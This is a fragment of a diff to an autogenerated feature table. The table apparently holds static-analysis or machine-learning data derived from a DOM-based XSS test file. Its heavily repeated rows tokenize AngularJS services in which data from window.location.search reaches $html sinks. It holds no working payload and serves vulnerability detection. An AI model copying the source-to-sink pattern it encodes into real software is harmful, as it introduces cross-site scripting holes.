| +| autogenerated/Xss/DomBasedXss/tst.js:146:5:161:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:161:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:161:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | angular ... }]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | exceptional return of angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | exceptional return of angular ... }]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | exceptional return of angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | exceptional return of angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:163:11 | exceptional return of angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:164:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:164:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:164:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:164:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:164:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | angular ... }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | exceptional return of angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | exceptional return of angular ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | exceptional return of angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | exceptional return of angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:166:10 | exceptional return of angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:168:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:168:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:168:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:168:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:168:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | angular ... }]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | exceptional return of angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | exceptional return of angular ... }]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | exceptional return of angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | exceptional return of angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:170:11 | exceptional return of angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:171:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:171:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:171:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:171:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:171:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | angular ... }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | exceptional return of angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | exceptional return of angular ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | exceptional return of angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | exceptional return of angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:173:10 | exceptional return of angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:13:146:18 | module | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:13:146:18 | module | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:13:146:18 | module | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:13:146:18 | module | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:13:146:18 | module | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:146:20:146:26 | 'myApp' | CalleeFlexibleAccessPath | angular.module | | autogenerated/Xss/DomBasedXss/tst.js:146:20:146:26 | 'myApp' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:146:20:146:26 | 'myApp' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16554,6 +115078,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:146:29:146:30 | [] | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:146:29:146:30 | [] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:146:29:146:30 | [] | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:147:10:147:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:10:147:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:147:10:147:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:10:147:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:147:10:147:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:147:18:147:39 | "xssSou ... ervice" | CalleeFlexibleAccessPath | angular.module().factory | | autogenerated/Xss/DomBasedXss/tst.js:147:18:147:39 | "xssSou ... ervice" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:147:18:147:39 | "xssSou ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16569,15 +115098,102 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:147:42:149:10 | ["xssSi ... }] | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:147:42:149:10 | ["xssSi ... }] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:43:147:59 | "xssSinkService1" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:147:61 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:147:61 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:147:62:147:61 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
